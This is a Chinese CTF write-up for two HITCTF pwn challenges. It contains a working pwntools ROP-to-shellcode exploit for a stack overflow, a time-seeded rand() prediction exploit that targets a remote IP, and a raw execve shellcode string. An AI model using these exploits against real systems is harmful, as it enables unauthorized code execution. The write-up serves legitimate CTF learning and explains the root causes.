HITCTF_WP_pwn4_5

pwn的两题签到

dagongren1

这题其实真的就很简单,查了一下保护全关。

思路就是往bss段里写个shellcode然后再调用就好了。

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Exploit script for dagongren1 (HITCTF pwn sign-in). The write-up states the
# binary was built with every protection disabled; the plan described above
# is a ROP chain that writes shellcode into .bss and then returns into it.
# Root cause, as far as the payload layout shows: a stack buffer overflow
# (0x20 bytes of filler, a saved-register slot, then a return address) with
# no stack canary, and a writable+executable .bss (no NX). Either NX or a
# canary alone would defeat this chain.
# NOTE(review): payloads are built with str concatenation and p64(), which
# only works under Python 2 / an old pwntools; on Python 3 these would have
# to be bytes. Left as written.

from pwn import *
context(arch = 'amd64', os = 'linux')
context.log_level ='DEBUG'
p=process('./dagongren1')
# p = remote('81.70.209.171',50201)
elf = ELF('./dagongren1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')   # NOTE(review): `elf` and `libc` are never used below



p.recvuntil('Come On')

# First stage: filler, one saved-register slot, then two return addresses.
# What 0x400737 and 0x4006D6 point at is not shown on the page; presumably
# they steer execution back to the vulnerable read so the longer chain
# below can be delivered — TODO confirm against the binary.
p.sendline('a'*0x20+p64(0)+p64(0x0400737)+p64(0x04006D6))
# gdb.attach(p)


# Gadget and symbol addresses (fixed image, no PIE per the write-up); all
# taken from the author's disassembly and not re-verified here.
pop_rdi_ret = 0x0000000000400813
bss = 0x000000000600C40
pop_rsi_r15_ret = 0x0000000000400811
ss = 0x00000000040088B                  # presumably the address of a scanf format string — TODO confirm
scanf_plt = 0x0000000004005D0
# Second stage: call scanf(ss, bss+0x300) so the next input line lands in
# .bss, then return to bss+0x300 to run it. Works only because .bss is
# executable.
py = ''
py += 'a'*0x20
py += p64(0xdeadbeef)                   # occupies the saved rbp slot; value is irrelevant
py += p64(pop_rdi_ret)
py += p64(ss)                           # rdi = first scanf argument
py += p64(pop_rsi_r15_ret)
py += p64(bss+0x300)                    # rsi = destination buffer in .bss
py += p64(0)                            # r15, unused
py += p64(scanf_plt)
py += p64(bss+0x300)                    # final return: into the buffer scanf just filled
# shellcode = asm(shellcraft.sh())
# Raw machine code standing in for the commented-out shellcraft.sh() call;
# the bytes are not decoded or verified here.
shellcode='\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
p.sendline(py)

sleep(0.1)                              # give the chain time to reach scanf before the second line is sent
p.sendline(shellcode)
p.interactive()

由于目标程序关闭了标准输出流，所以进入交互之后什么也看不到（本地运行还会报错）。

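# The target closed its stdout, so output has to go back through fd 0.
# The original annotated these lines with `//`, which is not shell comment
# syntax and would have been passed to sh as a (nonexistent) script path.
exec /bin/sh 1>&0   # new shell with stdout redirected onto fd 0
cat flag>&0         # same redirection for a single command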

lucky

这题我觉得比较像misc
它纯粹拿 time 当随机数种子，然后让你猜随机数。只要多写一个 C 程序，编译之后本地和远程两边各调用一次 rand() 再比较，就能 getshell。

time.cpp

#include<iostream>
#include<time.h>
#include <cstdlib>
using namespace std;

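// Local replay of the target's PRNG for the `lucky` challenge.
//
// Seeds rand() the way the write-up says the target does — time(0)/10 + 1 —
// and prints one rand() value in hex for every "1" read from stdin. Output
// format is unchanged from the original: first line is the seed base in
// decimal, then one hex number per request.
//
// Why this is possible at all: a PRNG seeded from wall-clock time is fully
// predictable by anyone who knows the seeding formula. The fix on the
// defending side is to seed from an OS entropy source (std::random_device /
// getrandom) and never to use rand() where unpredictability matters.
int main(){
    // Ten-second bucket: two processes started within the same bucket
    // derive the same seed.
    unsigned int time_rand = (unsigned int)time(0LL) / 0xA;
    std::cout << time_rand << std::endl;
    srand(time_rand + 1);

    int b;
    // Stop on EOF or unparsable input. The original do/while(1) never
    // terminated, so once stdin closed it spun forever.
    while (std::cin >> b) {
        if (b == 1) {
            int a = rand();
            std::cout << std::hex << a << std::endl;   // std::hex is sticky, as in the original
        }
    }
    return 0;
}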

exp

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Exploit script for `lucky`: the remote seeds rand() from the current time
# (per the write-up), so a local helper (./time, built from time.cpp above)
# seeded the same way reproduces its sequence. Predictable seeding is the
# whole bug here; there is no memory-safety issue involved.
# NOTE(review): written for Python 2 / an old pwntools (str payloads, the
# commented-out `print a[i]`); left as written.

from pwn import *
import time        # NOTE(review): unused
import random      # NOTE(review): unused
context(arch = 'amd64', os = 'linux')
context.log_level ='DEBUG'

# p=process('./lucky')
p=remote('81.70.209.171',51200)
p.recvuntil('enter your name,lucky guy')
p.sendline('0')


# Local oracle: ./time prints its seed base on the first line (discarded
# here), then one hex rand() value for every "1" it reads.
c=process('./time')
c.recvuntil('\n')


# Assumes the remote and the local helper fell into the same time bucket;
# presumably the helper's "+1" mirrors the target's seeding — TODO confirm
# (clock skew across a bucket boundary would desync the two sequences).
a=[0]*100
for i in range(100):
    c.sendline("1")
    a[i] = int(c.recvuntil("\n")[:-1],16)   # drop the trailing newline, parse hex
    # print a[i]
    p.recvuntil('Come and Guess the number:')
    p.sendline(str(a[i]))




p.interactive()

真的是太菜了,pwn只能打出两题签到。多谢密码大佬带飞